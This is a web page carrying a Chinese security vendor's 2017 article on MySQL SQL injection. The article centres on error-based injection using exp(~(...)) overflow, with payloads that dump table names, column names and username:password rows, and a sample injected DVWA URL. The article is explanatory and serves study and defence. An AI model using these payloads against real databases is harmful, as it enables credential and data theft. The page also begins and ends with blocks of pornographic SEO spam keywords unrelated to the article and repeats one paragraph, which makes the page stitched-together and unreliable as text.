欧美精品一区二区,体育生GAY白袜调教VIDEO,私人影院播放器,色偷偷AV老熟女色欲涩爱

?
內容中心
按關鍵字查找
Mysql數(shù)據(jù)庫安全漏洞之SQL注入(1)
作者:安華金和 發(fā)布時間:2017-01-31

Mysql數(shù)據(jù)庫在國內的市場占有量僅次于Oracle,排名第二。正因如此廣泛的使用,Mysql數(shù)據(jù)庫被曝出的安全漏洞數(shù)量同樣較高。安華金和2016年數(shù)據(jù)庫漏洞報告中指出,從可統(tǒng)計的數(shù)據(jù)庫安全漏洞分布情況來看,Mysql的漏洞數(shù)量開始超越Oracle,成為漏洞數(shù)量最多的數(shù)據(jù)庫類型,這表示由于使用人數(shù)增多,被發(fā)現(xiàn)的漏洞數(shù)量也隨之提高,而數(shù)據(jù)庫安全漏洞的存在,也成為黑客們SQL注入最佳途徑。本文將對Mysql中的SQL注入手段進行簡單介紹。

Mysql的SQL注入從技術角度主要可以分為7類技術手段:

1.常用mysql注入(SELECT)

2.常用mysql注入(insert、update)

3.mysql 報錯注入

4.mysql常規(guī)盲注

5.mysql時間盲注

6.mysql數(shù)據(jù)庫版本特征注入

7.mysql其他注入技巧

Osanda Malith Jayathissa 發(fā)現(xiàn)的這個漏洞屬于報錯注入的一種,作者通過構筑整數(shù)溢出來導致出現(xiàn)報錯信息。利用select ~0來獲取最大整數(shù)值,然后select ~0 +1 就可以達到溢出的目的。這說明只要用函數(shù)構筑0和1就可以達到讓目標函數(shù)緩沖區(qū)溢出的目的。

20170131-1.png

0的邏輯非就是1,任何一個查詢成功的返回值都是0所以我們可以利用這種方式來執(zhí)行我們希望執(zhí)行的操作。

20170131-2.png

注意看上圖中的報錯信息。在報錯信息中可以獲取到我們希望執(zhí)行的select user();的結果,但同時我們也發(fā)現(xiàn)存在一個限制,就是報錯信息只能返回極少的行數(shù),這一點可以通過limit x,y函數(shù)來解決。

作者同時給出了下面這些獲取表名、列名、數(shù)據(jù)方法的例子。

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
 select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));

注意看上圖中的報錯信息。在報錯信息中可以獲取到我們希望執(zhí)行的select user();的結果,但同時我們也發(fā)現(xiàn)存在一個限制,就是報錯信息只能返回極少的行數(shù),這一點可以通過limit x,y函數(shù)來解決。

作者同時給出了下面這些獲取表名、列名、數(shù)據(jù)方法的例子。

exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))
 http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#

下面這個查詢可以從當前的上下文中dump出所有的tables與columns,我們也可以dump出所有的數(shù)據(jù)庫。

exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))
 http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#  

在了解了初步的SQL注入技術手段后,我們將在后文中進一步介紹,如何利用Mysql中的安全漏洞進行SQL注入,以及如何使用適當?shù)?a href="http://m.wallpapic-fi.com/" target="_blank" title="數(shù)據(jù)庫安全">數(shù)據(jù)庫安全技術防護此類攻擊。

?
一本一道波多野结衣av视频| 亚洲色无码a片一区二区情欲| 农村熟女xxxxhd做受| 久久精品国产亚洲av麻豆| GOGOGO高清在线观看视频| 日本理伦片午夜理伦片| 中文字幕一区二区三区乱码| 亡は夫の上司最美人妻| 啊灬啊灬啊灬快灬高潮了听书| 亚洲av成人片无码www| 老板含着她的花蒂啃咬高潮的视频| 含着她两个硕大的乳峰| 性饥渴寡妇肉乱免费视频| 双性高h白嫩美人哭唧唧| 久久天天躁狠狠躁夜夜躁2014| 东京爱情动作故事| 欧美成年黄网站色视频| 波多野结衣 电影| 玩50岁四川熟人A片| 宫交h打桩hh灌尿| 精品人体无码一区二区三区| 小粉嫩精品a片在线视看| 久久精品中文字幕一区二区三区| 免费AV网站| 50多岁岳不让我戴套| 狠狠躁天天躁夜夜躁婷婷| 双xing挨cao日常美人多汁| 把腿扒开让我添30分钟视频| 诱人的女友bd在线| 同性男男黄G片免费网站18禁| 日产精品一线二线三线芒果| 清纯校花挨脔日常h| 男人撕开奶罩揉吮奶头gif| 欧洲aaaaa特级毛片| 双腿张开被9个男人调教| 无遮挡1000部拍拍拍免费| 国产欧美日韩| 成人性做爰AAA片免费看| 三个男人躁我一个阿啊阿广告 | 欧美vpswindows另类| 亚洲欧美精品午睡沙发|